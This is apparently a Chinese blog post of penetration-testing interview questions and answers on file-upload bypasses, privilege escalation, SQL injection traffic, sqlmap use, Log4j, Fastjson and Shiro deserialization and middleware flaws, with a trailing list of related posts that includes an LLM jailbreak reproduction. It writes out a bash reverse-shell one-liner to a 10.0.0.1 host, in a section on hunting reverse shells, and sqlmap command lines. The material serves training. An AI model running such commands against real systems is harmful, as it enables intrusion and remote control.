面试题(补充)

1、怎么加快盲注速度?

二分法和DNSlog外带测试

2、你说一下文件上传的绕过方式

*禁用前端js验证

*更改mime类型

*%00、0x00截断

*.htaccess、.user.ini.绕过

*文件扩展名绕过

*图片马绕过

3、反弹shel

反弹shell就是靶机将shell反弹给攻击者,从而达到让攻击者可以在靶机上执行shell命令,从而控制靶机

4、对护网红蓝对抗的理解

护网的红蓝对抗一般分为3个队伍:蓝队、红队和紫队,蓝队是防守方、红队是攻击方、紫队相当于裁判队

蓝队:不对用户造成太多限制的情况下,发现可被利用的漏洞,保护自己的领域

红队:用各种手段进行攻击

5、渗透测试流程

信息收集:

1、获取域名whois信息

2、服务器子域名、旁站、c段查询

3、服务器操作系统版本补丁状况、web中间件类型、版本、数据库类型等

4、服务器开放端口:22 ssh 80 web 445 3389.。

漏洞扫描:

nessus,awvs ,appscan

漏洞验证:

是否存在漏洞,是否可以拿到webshell或者其他权限

权限提升:

windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权

linux内核漏洞提权、sudoer配置文件错误提权、SUID、SUDO

横向渗透

日志清理

6、内网渗透

*内网信息收集

*漏洞探测

*漏洞利用

*权限提升

*权限维持

7、windows、linux提权

windows提权:内核溢出提权,数据库提权、web中间件提权、系统错误配置漏洞提权

linux提权:内核漏洞提权、sudoer配置文件错误提权、SUDO、SUID提权

8、SQL注入的流量特征

1.参数长度异常:攻击者通常会在SQL注入攻击中使用长参数来尝试构建恶意语句,因此在网络流量中需要寻找异常长度的参数。

2.非法字符:攻击者通常使用非法字符来构建恶意SQL语句,如单引号、分号等。

3.异常请求:攻击者可能会在HTTP请求中包含多个语句或查询,或者在HTTP请求中包含错误或缺失的参数。

4.错误响应:如果应用程序未正确处理SQL注入攻击,则可能会返回错误响应。攻击者可以通过分析响应以查找此类错误,并尝试进一步攻击。

5.非常规流量:攻击者可能会在较短时间内发送大量请求,或在同一时间窗口内多次发送相同请求。这种非常规流量模式可能表明攻击正在进行中。

9、sqlmap如何post发起请求

*sqlmap -u xxxxx --data "user=1&password=2" --random-agent

*用burpsuite抓取post请求包,保存到txt文件中,sqlmap -r 123.txt

10、登陆注册框页面可以测试哪些漏洞

1、弱口令

2、sql注入

3、暴力破解

4、验证码绕过

5、目录扫描工具

6、js敏感信息泄露

11、排查反弹shell

明确反弹shell写法: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

1、登录服务器查看命令:ps -ef,过滤出反弹shell的进程

2、定位进程启动路径,命令:pwdx pid

3、进入启动路径,确认启动的服务是否正常,命令:cd *

4、定位可疑文件,并删除。命令:rm

5、停止进程shell进程,命令:kill -9 pid

14.常见的框架漏洞?

答;

log4j远程代码执行漏洞

原理: Log4j 是Apache 的一个开源项目,是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`{\`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。 具体操作: 在正常的log处理过程中对\*\*{**这两个紧邻的字符做了检测,一旦匹配到类似于表达式结构的字符串就会触发替换机制,将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行

Fastjson反序列化漏洞

判断: 正常请求是get请求并且没有请求体,可以通过构造错误的POST请求,即可查看在返回包中是否有fastjson这个字符串来判断。 原理: fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。 无回显怎么办: 1.一种是直接将命令执行结果写入到静态资源文件里,如html、js等,然后通过http访问就可以直接看到结果 2.通过dnslog进行数据外带,但如果无法执行dns请求就无法验证了 3.直接将命令执行结果回显到请求Poc的HTTP响应中

Shiro反序列化漏洞

原理: Shiro是Apache下的一个开源Java安全框架,执行身份认证,授权,密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项,那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求,就不需要重新输入用户名和密码。 判断: 1.数据返回包中包含rememberMe=deleteMe字段。 2.直接发送原数据包,返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段:****rememberMe=然后查看返回数据包中是否存在关键字。 shiro-550: shiro反序列化漏洞利用有两个关键点,首先是在shiro<1.2.4时,AES加密的密钥Key被硬编码在代码里,只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法,readObject用来执行反序列化后需要执行的代码片段,从而造成恶意命令可以被执行。攻击者构造恶意代码,并且序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码,解密并且反序列化,最终造成反序列化漏洞。 shiro-721: 不需要key,利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。

13、常见中间件漏洞

(一) IIS

解析漏洞

(二) Apache

解析漏洞

目录遍历

(三) Nginx

文件解析

目录穿越

(四)Tomcat

1、任意文件上传

2、未授权弱口令+war后门文件部署

(五)jBoss

1、反序列化漏洞

2、war后门文件部署

(六)WebLogic

1、反序列化漏洞

3、任意文件上传

4、war后门文件部署

xss 有 cookie 一定可以无用户名密码登录吗?

基本可以。因为把 cookie 的值给浏览器,浏览器去访问页面会用已有的cookie 去访问,如果 cookie 有效,就会直接进去。

相关推荐
Ginkgo_Lo29 分钟前
【LLM越狱】AI大模型DRA攻击解读与复现
人工智能·安全·ai·语言模型
七牛云行业应用1 小时前
企业级AI大模型选型指南:从评估部署到安全实践
大数据·人工智能·安全
CV-杨帆4 小时前
大模型在题目生成中的安全风险研究综述
人工智能·深度学习·安全
猫耳君4 小时前
汽车功能安全 Functional Safety ISO 26262 测试之一
测试开发·安全·汽车·功能安全·汽车测试·汽车电子测试
ZYMFZ5 小时前
Linux系统 SELinux 安全管理与故障排查
linux·运维·安全
BillKu5 小时前
Vue3 中使用 DOMPurify 对渲染动态 HTML 进行安全净化处理
前端·安全·html
云边云科技17 小时前
门店网络重构:告别“打补丁”,用“云网融合”重塑数字竞争力!
大数据·人工智能·安全·智能路由器·零售
lingggggaaaa19 小时前
小迪安全v2023学习笔记(八十一讲)—— 框架安全&ThinkPHP&Laravel&Struts2&SpringBoot&CVE复现
笔记·学习·struts·安全·网络安全·laravel
NewCarRen19 小时前
汽车EPAS ECU功能安全建模分析:Gamma框架+深度概率编程落地ISO 26262(含寿命预测案例)
安全·汽车
Amy1870211182320 小时前
中线安防保护器,也叫终端电气综合治理保护设备为现代生活筑起安全防线
人工智能·安全·智慧城市